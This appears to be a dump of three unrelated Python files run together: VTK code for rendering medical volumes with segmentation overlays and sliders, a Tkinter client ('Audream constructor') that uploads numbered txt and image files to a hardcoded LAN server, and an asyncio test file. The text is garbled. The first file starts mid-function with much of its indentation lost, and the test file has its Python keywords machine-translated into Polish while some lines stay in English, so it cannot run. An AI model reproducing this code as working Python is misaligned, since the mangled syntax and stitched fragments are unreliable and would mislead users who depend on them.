dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()
dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()
dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()
dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()
dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()
print(dim1_minValue, dim1_maxValue)
print(dims)
extractVOI.SetVOI(int(dim1_minValue), int(dim1_maxValue),
int(dim2_minValue), int(dim2_maxValue),
int(dim3_minValue), int(dim3_maxValue))
extractVOI.Update()
print(extractVOI.GetOutput().GetDimensions())
print('update_crop')
sliceMapper_i_min.SetSliceNumber(int(dim1_minValue))
sliceMapper_j_min.SetSliceNumber(int(dim2_minValue))
sliceMapper_k_min.SetSliceNumber(int(dim3_minValue))
sliceMapper_i_max.SetSliceNumber(int(dim1_maxValue))
sliceMapper_j_max.SetSliceNumber(int(dim2_maxValue))
sliceMapper_k_max.SetSliceNumber(int(dim3_maxValue))
dim1_sliderWidget_min, dim1_sliderWidget_max = getCropSlider(1, dim_size=dims[0])
dim2_sliderWidget_min, dim2_sliderWidget_max = getCropSlider(2, dim_size=dims[1])
dim3_sliderWidget_min, dim3_sliderWidget_max = getCropSlider(3, dim_size=dims[2])
dim1_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim1_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim2_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim2_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim3_sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim3_sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_crop)
dim1_sliderWidget_min.EnabledOn()
dim1_sliderWidget_max.EnabledOn()
dim2_sliderWidget_min.EnabledOn()
dim2_sliderWidget_max.EnabledOn()
dim3_sliderWidget_min.EnabledOn()
dim3_sliderWidget_max.EnabledOn()
return render, sliderWidget_min, sliderWidget_max
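# A minimal, self-contained sketch (not called anywhere in this file) of the
# vtkExtractVOI filter that update_crop() drives above. The VOI is an inclusive
# (imin, imax, jmin, jmax, kmin, kmax) index range; the array shape here is
# illustrative only.
def _demo_extract_voi():
    data = np.zeros((32, 32, 32), dtype=np.float32)
    img = vtkImageImportFromArray()
    img.SetArray(np.ascontiguousarray(data))
    img.Update()
    voi = vtk.vtkExtractVOI()
    voi.SetInputData(img.GetOutput())
    voi.SetVOI(4, 27, 4, 27, 4, 27)  # keep the central block
    voi.Update()
    print(voi.GetOutput().GetDimensions())  # inclusive range -> (24, 24, 24)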
def getRenderSrcWithSeg(camera,
renWinInteractor,
renWin,
numpyImage_src,
numpyImage_segs,
spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)
numpyImage_src = maxValue * numpyImage_src / np.max(numpyImage_src)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr_src = vtkImageImportFromArray()
img_arr_src.SetArray(np.ascontiguousarray(numpyImage_src))
img_arr_src.SetDataSpacing(spacing)
img_arr_src.SetDataOrigin((0, 0, 0))
img_arr_src.Update()
    tcfun_src = vtk.vtkPiecewiseFunction()  # scalar opacity transfer function
tcfun_src.AddPoint(minValue + 1, 1.0)
tcfun_src.AddPoint(maxValue, 1.0)
    gradtfun_src = vtk.vtkPiecewiseFunction()  # gradient opacity transfer function
gradtfun_src.AddPoint(0.0, 0.0)
gradtfun_src.AddPoint(1.0, 0.6)
gradtfun_src.AddPoint(3.0, 0.8)
gradtfun_src.AddPoint(maxValue, 1.0)
    ctfun_src = vtk.vtkColorTransferFunction()  # color transfer function
ctfun_src.AddRGBPoint(minValue, 0.9, 0.1, 0.1)
ctfun_src.AddRGBPoint(maxValue, 0.9, 0.1, 0.1)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr_src.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
    volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper()  # GPU ray-casting volume mapper
    volumeMapper_src.SetInputData(img_arr_src.GetOutput())  # feed the imported image data into the mapper
    volumeProperty_src = vtk.vtkVolumeProperty()  # property container for the color and opacity functions
volumeProperty_src.SetColor(ctfun_src)
volumeProperty_src.SetScalarOpacity(tcfun_src)
volumeProperty_src.SetGradientOpacity(gradtfun_src)
    volumeProperty_src.SetInterpolationTypeToLinear()  # trilinear interpolation between voxels
volumeProperty_src.ShadeOn()
    render_volume_src = vtk.vtkVolume()  # the volume "actor"
render_volume_src.SetMapper(volumeMapper_src)
render_volume_src.SetProperty(volumeProperty_src)
render.AddActor(outlineActor)
render.AddVolume(render_volume_src)
volumeProperty_segs = []
for i, numpyImage_seg in enumerate(numpyImage_segs):
print("add seg")
numpyImage_seg = numpyImage_seg.astype(np.float32) - np.min(numpyImage_seg)
numpyImage_seg = maxValue * numpyImage_seg / np.max(numpyImage_seg)
numpyImage_seg = (numpyImage_seg > 4) * 10.0
img_arr_seg = vtkImageImportFromArray()
img_arr_seg.SetArray(np.ascontiguousarray(numpyImage_seg))
img_arr_seg.SetDataSpacing(spacing)
img_arr_seg.SetDataOrigin((0, 0, 0))
img_arr_seg.Update()
        tcfun_seg = vtk.vtkPiecewiseFunction()  # scalar opacity transfer function
tcfun_seg.AddPoint(minValue + 1, 0.2)
tcfun_seg.AddPoint(maxValue, 0.2)
        gradtfun_seg = vtk.vtkPiecewiseFunction()  # gradient opacity transfer function
gradtfun_seg.AddPoint(minValue, 0.0)
gradtfun_seg.AddPoint(1.0, 0.3)
gradtfun_seg.AddPoint(maxValue, 0.5)
        ctfun_seg = vtk.vtkColorTransferFunction()  # color transfer function
ctfun_seg.AddRGBPoint(minValue, 0.9 * i, 0.9, 0.0)
ctfun_seg.AddRGBPoint(maxValue, 0.9 * i, 0.9, 0.3)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr_seg.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
        volumeMapper_seg = vtk.vtkGPUVolumeRayCastMapper()  # GPU ray-casting volume mapper
        volumeMapper_seg.SetInputData(img_arr_seg.GetOutput())  # feed the imported label data into the mapper
        volumeProperty_seg = vtk.vtkVolumeProperty()  # property container for the color and opacity functions
volumeProperty_seg.SetColor(ctfun_seg)
volumeProperty_seg.SetScalarOpacity(tcfun_seg)
volumeProperty_seg.SetGradientOpacity(gradtfun_seg)
        volumeProperty_seg.SetInterpolationTypeToLinear()  # trilinear interpolation between voxels
volumeProperty_seg.ShadeOn()
volumeProperty_segs.append(volumeProperty_seg)
        render_volume_seg = vtk.vtkVolume()  # the volume "actor"
render_volume_seg.SetMapper(volumeMapper_seg)
render_volume_seg.SetProperty(volumeProperty_seg)
render.AddActor(outlineActor)
render.AddVolume(render_volume_seg)
render.ResetCamera()
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(10)
sliderRep_min.SetValue(1)
sliderRep_min.SetTitleText("minValue")
sliderRep_min.SetSliderLength(0.025)
sliderRep_min.SetSliderWidth(0.05)
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(0.15 / 1, 0.1)
sliderRep_min.GetPoint2Coordinate().SetValue(0.45 / 1, 0.1)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(10)
sliderRep_max.SetValue(9)
sliderRep_max.SetTitleText("maxValue")
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.05)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(0.55 / 1, 0.1)
sliderRep_max.GetPoint2Coordinate().SetValue(0.85 / 1, 0.1)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
def update_minmax(obj, ev):
# print(obj)
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
# reset value
if minValue >= maxValue:
if obj == sliderWidget_max:
sliderWidget_max.GetRepresentation().SetValue(max(maxValue, minValue + 0.01))
elif obj == sliderWidget_min:
sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
tcfun_src.RemoveAllPoints()
tcfun_src.AddPoint(minValue, 0.0)
tcfun_src.AddPoint(maxValue, 1.0)
volumeProperty_src.SetScalarOpacity(tcfun_src)
# print(minValue, maxValue)
sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_min.EnabledOn()
sliderWidget_max.EnabledOn()
    # keyboard-driven interaction
    class KeyPressInteractorStyle(vtk.vtkInteractorStyleTrackballCamera):
        def __init__(self, parent=None, *args, **kwargs):
            # two-argument super() so the parent class is actually initialized
            super(KeyPressInteractorStyle, self).__init__(*args, **kwargs)
            self.parent = vtk.vtkRenderWindowInteractor()
            if parent is not None:
                self.parent = parent
            self.AddObserver("KeyPressEvent", self.keyPress)
def keyPress(self, obj, event):
key = self.parent.GetKeySym()
if key.upper() == 'X':
opacity = tcfun_seg.GetValue(0)
if opacity:
print('Hide Label')
tcfun_seg.RemoveAllPoints()
tcfun_seg.AddPoint(minValue, 0.0)
tcfun_seg.AddPoint(maxValue, 0.0)
for volumeProperty_seg in volumeProperty_segs:
volumeProperty_seg.SetScalarOpacity(tcfun_seg)
renWin.Render()
else:
print('Show Label')
tcfun_seg.RemoveAllPoints()
tcfun_seg.AddPoint(minValue + 1, 0.2)
tcfun_seg.AddPoint(maxValue, 0.2)
for volumeProperty_seg in volumeProperty_segs:
volumeProperty_seg.SetScalarOpacity(tcfun_seg)
renWin.Render()
if key == 'Down':
# print('Down')
# tfun.RemoveAllPoints()
# tfun.AddPoint(1129, 0)
renWin.Render()
    renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor))  # install the custom key-press style (e.g. 'x' toggles the labels)
return render, sliderWidget_min, sliderWidget_max
# return render, None, None
def vtkShowTogether(numpyImage_src, numpyImage_segs, spacing=(1.0, 1.0, 1.0)):
assert isinstance(numpyImage_src, np.ndarray)
if isinstance(numpyImage_segs, np.ndarray):
numpyImage_segs = [numpyImage_segs]
assert isinstance(numpyImage_segs, (list, tuple)), "numpyImage_segs must be one of list or tuple"
num_seg = len(numpyImage_segs)
assert 0 <= num_seg <= 4
spacing = tuple(reversed(spacing))
renWin = vtk.vtkRenderWindow()
renWinInteractor = vtk.vtkRenderWindowInteractor()
    renWinInteractor.SetRenderWindow(renWin)  # attach the render window to the interactor
renWin.SetSize(300, 300)
# print(col, row)
camera = vtk.vtkCamera()
print('shape of data', numpyImage_src.shape)
pos = (0, 0, 1.0, 1.0)
render, sliderWidget_min, sliderWidget_max = getRenderSrcWithSeg(camera, renWinInteractor, renWin,
numpyImage_src, numpyImage_segs, spacing,
pos=pos)
# render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(1,
# camera, renWinInteractor,
# numpyImage_src, spacing,
# pos=pos)
renWin.AddRenderer(render)
# renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor)) # 在交互操作里面添加这个自定义的操作例如up,down
# renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera()) # 在交互操作里面添加这个自定义的操作例如up,down
renWin.Render()
renWinInteractor.Start()
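# Hedged usage sketch for vtkShowTogether (not part of the pipeline above):
# overlay one synthetic segmentation on a synthetic volume; the shapes, spacing
# and threshold are made up for illustration.
def _demo_show_together():
    src = np.random.rand(64, 64, 64).astype(np.float32)
    seg = (src > 0.95).astype(np.float32)  # fake binary mask
    vtkShowTogether(src, seg, spacing=(1.0, 0.7, 0.7))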
def vtkShowMulti(numpyImage_srcs, numpyImage_segs, spacing=(1.0, 1.0, 1.0)):
if isinstance(numpyImage_srcs, np.ndarray):
numpyImage_srcs = [numpyImage_srcs]
if isinstance(numpyImage_segs, np.ndarray):
numpyImage_segs = [numpyImage_segs]
assert isinstance(numpyImage_srcs, (list, tuple)), "numpyImage_srcs must be one of list or tuple"
assert isinstance(numpyImage_segs, (list, tuple)), "numpyImage_segs must be one of list or tuple"
num_src = len(numpyImage_srcs)
num_seg = len(numpyImage_segs)
assert 0 <= num_src <= 4 and 0 <= num_seg <= 4
spacing = tuple(reversed(spacing))
    # keyboard-driven interaction
    class KeyPressInteractorStyle(vtk.vtkInteractorStyleTrackballCamera):
        def __init__(self, parent=None, *args, **kwargs):
            # two-argument super() so the parent class is actually initialized
            super(KeyPressInteractorStyle, self).__init__(*args, **kwargs)
            self.parent = vtk.vtkRenderWindowInteractor()
            if parent is not None:
                self.parent = parent
            self.AddObserver("KeyPressEvent", self.keyPress)
def keyPress(self, obj, event):
key = self.parent.GetKeySym()
if key == 'Up':
# gradtfun.AddPoint(-100, 1.0)
# gradtfun.AddPoint(10, 1.0)
# gradtfun.AddPoint(20, 1.0)
#
# volumeProperty.SetGradientOpacity(gradtfun)
renWin.Render()
if key == 'Down':
# print('Down')
# tfun.RemoveAllPoints()
# tfun.AddPoint(1129, 0)
renWin.Render()
camera = vtk.vtkCamera()
renWin = vtk.vtkRenderWindow()
renWinInteractor = vtk.vtkRenderWindowInteractor()
    renWinInteractor.SetRenderWindow(renWin)  # attach the render window to the interactor
col = max(num_seg, num_src)
row = int(num_seg > 0) + int(num_src > 0)
renWin.SetSize(300 * col, 300 * row)
# print(col, row)
for i, numpyImage_src in enumerate(numpyImage_srcs):
pos = [i / col, 1 - 1 / row, (i + 1) / col, 1]
print('shape of data No.', i, numpyImage_src.shape, pos)
render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(col,
camera, renWinInteractor,
numpyImage_src, spacing,
pos=pos)
renWin.AddRenderer(render)
for i, numpyImage_seg in enumerate(numpyImage_segs):
pos = [i / col, 0, (i + 1) / col, 1 / row]
print('shape of data No.', i, numpyImage_seg.shape, pos)
render = getRenderOfSegImage(col,
camera, renWinInteractor,
numpyImage_seg, spacing,
pos=pos)
renWin.AddRenderer(render)
    # renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor))  # custom key-press style
    renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera())  # standard trackball-camera interaction
renWin.Render()
renWinInteractor.Start()
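# Hedged usage sketch for vtkShowMulti: two source volumes on the top row and
# one segmentation on the bottom row, all synthetic.
def _demo_show_multi():
    a = np.linspace(0, 1, 64 ** 3, dtype=np.float32).reshape(64, 64, 64)
    b = a[::-1].copy()
    seg = (a > 0.5).astype(np.float32)
    vtkShowMulti([a, b], [seg], spacing=(1.0, 1.0, 1.0))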
def vtkShowNotebook(numpyImage, spacing=(1.0, 1.0, 1.0)):
print('Running vtkShow ...')
from importlib import import_module
import tempfile
import sys
import shutil
#
# with tempfile.TemporaryDirectory() as temp_config_dir:
# print(temp_config_dir)
# temp_config_file = tempfile.NamedTemporaryFile(
# dir=temp_config_dir, suffix='.py', delete=False)
# temp_config_name = os.path.basename(temp_config_file.name)
# shutil.copyfile(os.path.dirname(__file__) + '/tmp_func.py', os.path.join(temp_config_dir, temp_config_name))
# temp_module_name = os.path.splitext(temp_config_name)[0]
# sys.path.insert(0, temp_config_dir)
# pickle.dump({'data': numpyImage, 'spacing': spacing}, open(temp_config_dir + '/tmp.pkl', 'wb'))
# mod = import_module(temp_module_name)
# del sys.modules[temp_module_name]
# # close temp file
# temp_config_file.close()
# pool = multiprocessing.Pool(1)
# pool.apply(func=_vtkShow, args=(numpyImage, spacing,))
# pool.close()
# pool.join()
    tmp_path = os.path.dirname(__file__) + '/tmp.pkl'
    if os.path.exists(tmp_path):
        os.remove(tmp_path)
    with open(tmp_path, 'wb') as f:  # close the file handle instead of leaking it
        pickle.dump({'data': numpyImage, 'spacing': spacing}, f)
    print(os.path.dirname(__file__))
    cmd = f'{sys.executable} "{os.path.dirname(__file__)}/tmp_func.py" 1'
    print(cmd)
    os.system(cmd)
print('closing')
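# tmp_func.py itself is not shown in this file; the child-process side of the
# pickle handoff presumably looks something like this hypothetical sketch:
#
#   import os, pickle
#   with open(os.path.dirname(__file__) + '/tmp.pkl', 'rb') as f:
#       payload = pickle.load(f)
#   vtkShow(payload['data'], payload['spacing'])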
def vtkShow(numpyImage, spacing=(1.0, 1.0, 1.0)):
assert isinstance(numpyImage, np.ndarray), "numpyImage_srcs must be one of list or tuple"
spacing = tuple(reversed(spacing))
camera = vtk.vtkCamera()
renWin = vtk.vtkRenderWindow()
renWinInteractor = vtk.vtkRenderWindowInteractor()
    renWinInteractor.SetRenderWindow(renWin)  # attach the render window to the interactor
renWin.SetSize(450, 300)
pos = [0, 0, 1, 1]
print('shape of data ', numpyImage.shape, pos, spacing)
render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(1,
camera, renWinInteractor,
numpyImage, spacing,
pos=pos)
renWin.AddRenderer(render)
    # renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor))  # custom key-press style
    renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera())  # standard trackball-camera interaction
renWin.Render()
renWinInteractor.Start()
print('Closing')
renWin.Finalize()
renWinInteractor.TerminateApp()
# renWin.Render()
# renWin.Finalize()
# renWinInteractor.TerminateApp()
# renWin.End() # will cause Notebook restart
# del renWin, renWinInteractor
return
def vtkScreenshot(filename, numpyImage, spacing=(1.0, 1.0, 1.0)):
p = multiprocessing.Process(target=_vtkScreenshot, args=(filename, numpyImage, spacing,))
p.start()
# if os.path.exists(filename):
# p.terminate() # sends a SIGTERM
def _vtkScreenshot(filename, numpyImage, spacing=(1.0, 1.0, 1.0)):
assert isinstance(numpyImage, np.ndarray), "numpyImage_srcs must be one of list or tuple"
d, h, w = numpyImage.shape
spacing = tuple(reversed(spacing))
camera = vtk.vtkCamera()
camera.SetPosition(2 * d, 2 * h, 2 * w)
renWin = vtk.vtkRenderWindow()
renWin.SetSize(1024, 1024)
renWin.SetOffScreenRendering(1)
renWinInteractor = vtk.vtkRenderWindowInteractor()
    renWinInteractor.SetRenderWindow(renWin)  # attach the render window to the interactor
pos = [0, 0, 1, 1]
print('shape of data ', numpyImage.shape, pos, spacing)
render, sliderWidget_min, sliderWidget_max = getRenderOfSrcImage(1,
camera, renWinInteractor,
numpyImage, spacing,
pos=pos)
renWin.Render()
    renWinInteractor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera())  # standard trackball-camera interaction
renWin.AddRenderer(render)
renWin.Render()
# renWinInteractor.Start()
# Screenshot
windowToImageFilter = vtk.vtkWindowToImageFilter()
windowToImageFilter.SetInput(renWin)
    # windowToImageFilter.SetScale(3)  # optionally scale up the output resolution (SetScale in newer VTK, SetMagnification in older)
windowToImageFilter.SetInputBufferTypeToRGBA() # also record the alpha (transparency) channel
windowToImageFilter.ReadFrontBufferOff() # read from the back buffer
windowToImageFilter.Update()
writer = vtk.vtkPNGWriter()
writer.SetFileName(filename)
writer.SetInputConnection(windowToImageFilter.GetOutputPort())
writer.Write()
    # renWinInteractor.SetInteractorStyle(KeyPressInteractorStyle(parent=renWinInteractor))  # custom key-press style
# renWin.Render()
# renWinInteractor.Start()
# renWin.Finalize()
# renWinInteractor.GetRenderWindow().Finalize()
# renWinInteractor.TerminateApp()
# del renWin, renWinInteractor
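# Hedged usage sketch for vtkScreenshot: render a synthetic volume off-screen in
# a child process and write it to a PNG (the file name is illustrative).
def _demo_screenshot():
    vol = np.zeros((64, 64, 64), dtype=np.float32)
    vol[16:48, 16:48, 16:48] = 1.0  # a bright cube in the middle
    vtkScreenshot('demo_volume.png', vol, spacing=(1.0, 1.0, 1.0))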
"""
https://www.programcreek.com/python/?code=adityadua24%2Frobopy%2Frobopy-master%2Frobopy%2Fbase%2Fgraphics.py
"""
|
constructor.py
|
import Tkinter as tk
import ttk
import socket
import os
from time import sleep
import threading
n_files = 0
counter = 0
path = "work_directory" + "/"
prbar_flag = True
def progress():
    # poll the shared counter and mirror it into the progress bar
    while prbar_flag:
        prbar['value'] = counter
        if prbar["value"] >= prbar["maximum"]:
            break
        sleep(0.1)  # avoid a busy loop
    return
def check_fool(outlist):
    global n_files
    for one in outlist:
        if not one.isdigit():
            err = "name dir is wrong: '" + one + "'"
            return 0, err
        inlist = os.listdir(path + one)
        for f in inlist:
            n_files += 1
            # os.path.splitext cannot IndexError on names without an extension
            name, ext = os.path.splitext(f)
            if ext not in (".jpg", ".png", ".txt"):
                err = "Wrong format of file: '" + f + "'"
                return 0, err
            if not name.isdigit():
                err = "file name is wrong: '" + f + "'"
                return 0, err
    return 1, "OK"
def sendFile(s, f, form):
    # 'form' is a one-byte format tag ("J"/"P") or -1 for "no tag";
    # f is an open file object or -1 for "file missing".
    if form != -1:
        s.send(form)
    if f != -1:
        for line in f:
            # length-prefix each line with a 16-bit big-endian size
            k1 = chr(len(line) >> 8)
            k2 = chr(len(line) - (ord(k1) << 8))
            s.send(k1)
            s.send(k2)
            s.send(line)
    # terminator: a zero byte, then the 5-byte marker ";;;;;"
    s.send(chr(0))
    s.send(chr(5))
    s.send(";;;;;")
    return
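# The matching receiver is not part of this file. A hypothetical Python 2 sketch
# of decoding one stream framed by sendFile (note the protocol ambiguity: a real
# 5-byte line also starts with the prefix 0x00 0x05, so the terminator is only
# unambiguous if no line is exactly 5 bytes long):
#
#   def recvFile(conn):
#       chunks = []
#       while True:
#           k1, k2 = conn.recv(1), conn.recv(1)
#           if ord(k1) == 0 and ord(k2) == 5:  # terminator 0x00 0x05 + ";;;;;"
#               conn.recv(5)
#               return "".join(chunks)
#           chunks.append(conn.recv((ord(k1) << 8) + ord(k2)))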
def sendVar(n):
s = socket.socket()
s.connect(("192.168.43.110",9999))
global counter
prbar["maximum"] = n_files
s.send("1 0")
s.send(chr(len(n)))
for i in range(1, len(n) + 1):
for j in range(1, 5):
zt = path + str(i) + "/" + str(j) + ".txt"
zp = path + str(i) + "/" + str(j) + ".jpg"
try:
f1 = open (zt, "rb")
except IOError:
sendFile(s, -1, -1) # send empty txt file
counter += 1
else:
sendFile(s, f1, -1) # send not empty txt file
f1.close()
counter += 1
if j == 1:
try:
f2 = open (zp, "rb")
except IOError:
try:
zp = path + str(i) + "/" + str(j) + ".png"
f2 = open (zp, "rb")
except IOError:
sendFile(s, -1, "J") # send empty jpg file
counter += 1
else:
sendFile(s, f2, "P") # send not empty png file
f2.close()
counter += 1
else:
sendFile(s, f2, "J")
f2.close()
counter += 1
else:
try:
f2 = open (zp, "rb")
except IOError:
try:
zp = path + str(i) + "/" + str(j) + ".png"
f2 = open(zp, "rb")
except IOError:
sendFile(s, -1, "J")
counter += 1
else:
sendFile(s, f2, "P")
f2.close()
counter += 1
else:
sendFile(s, f2, "J")
f2.close()
counter += 1
k = s.recv(1)
lvars = s.recv(ord(k))
lblvars['text'] = lvars
s.close()
btn1["state"] = tk.NORMAL
btn2["state"] = tk.NORMAL
return
def fake_sendVar():
btn1["state"] = tk.DISABLED
btn2["state"] = tk.DISABLED
n = os.listdir(path)
flag = 0
code, err = check_fool(n)
if not len(n) or not code:
if err == "OK":
err = "work_directory is empty"
flag += 1
errform = tk.Toplevel(root)
errform.resizable(0, 0)
errform.geometry("400x90")
errform.transient(root)
errlbl = tk.Label(errform, text="Error:" + err + "\nPlease, complete all instructions", font="7")
errbtn = tk.Button(errform, text="Ok!", width=5, height=1, command=errform.destroy)
errlbl.place(x=10, y=20)
errbtn.place(x=15, y=60)
if flag:
btn1["state"] = tk.NORMAL
btn2["state"] = tk.NORMAL
return
threading.Thread(target=lambda:sendVar(n)).start()
threading.Thread(target=progress).start()
return
def exitAll():
global prbar_flag
prbar_flag = False
root.destroy()
return
root = tk.Tk()
#root.iconbitmap(os.getcwd() + "/icon.ico")
root.geometry('400x180')
root.title("Audream constructor v0.1")
#root.protocol('WM_DELETE_WINDOW')
btn1 = tk.Button(root, text="Send variant", width=15, height=3, command=fake_sendVar)
btn1.place(x=130, y=100)
btn2 = tk.Button(root, text="Exit", width=5, height=1, command=exitAll)
btn2.place(x=320, y=15)
lbl1 = tk.Label(root, text="Your numbers are:")
lbl1.place(x=10, y=10)
prbar = ttk.Progressbar(root, orient="horizontal", length=200, mode="determinate")
prbar.pack(side="bottom")
lblvars = tk.Label(root, font="Monospace 15")
lblvars.place(x=150, y=50)
root.mainloop()
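# Note: progress() and sendVar() update Tkinter widgets from worker threads,
# which Tkinter does not guarantee to be safe. A common alternative is to poll
# the shared counter from the main loop with after(); hedged sketch using the
# globals above:
#
#   def poll_progress():
#       prbar['value'] = counter
#       if prbar['value'] < prbar['maximum']:
#           root.after(100, poll_progress)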
|
test_base_events.py
|
"""Tests dla base_events.py"""
zaimportuj errno
zaimportuj logging
zaimportuj math
zaimportuj socket
zaimportuj sys
zaimportuj threading
zaimportuj time
zaimportuj unittest
z unittest zaimportuj mock
zaimportuj asyncio
z asyncio zaimportuj base_events
z asyncio zaimportuj constants
z asyncio zaimportuj test_utils
spróbuj:
z test zaimportuj support
wyjąwszy ImportError:
z asyncio zaimportuj test_support jako support
spróbuj:
z test.support.script_helper zaimportuj assert_python_ok
wyjąwszy ImportError:
spróbuj:
z test.script_helper zaimportuj assert_python_ok
wyjąwszy ImportError:
z asyncio.test_support zaimportuj assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
klasa BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
        with self.assertRaises(NotImplementedError):
            gen.send(None)
    def test_close(self):
        self.assertFalse(self.loop.is_closed())
        self.loop.close()
        self.assertTrue(self.loop.is_closed())
        # it should be possible to call close() more than once
        self.loop.close()
        self.loop.close()
        # operation blocked when the loop is closed
        f = asyncio.Future(loop=self.loop)
        self.assertRaises(RuntimeError, self.loop.run_forever)
        self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
    def test__add_callback_handle(self):
        h = asyncio.Handle(lambda: False, (), self.loop)
        self.loop._add_callback(h)
        self.assertFalse(self.loop._scheduled)
        self.assertIn(h, self.loop._ready)
    def test__add_callback_cancelled_handle(self):
        h = asyncio.Handle(lambda: False, (), self.loop)
        h.cancel()
        self.loop._add_callback(h)
        self.assertFalse(self.loop._scheduled)
        self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_getnameinfo(self):
sockaddr = mock.Mock()
self.loop.run_in_executor = mock.Mock()
self.loop.getnameinfo(sockaddr)
self.assertEqual(
            (None, socket.getnameinfo, sockaddr, 0),
            self.loop.run_in_executor.call_args[0])
    def test_call_soon(self):
        def cb():
            pass
        h = self.loop.call_soon(cb)
        self.assertEqual(h._callback, cb)
        self.assertIsInstance(h, asyncio.Handle)
        self.assertIn(h, self.loop._ready)
    def test_call_later(self):
        def cb():
            pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
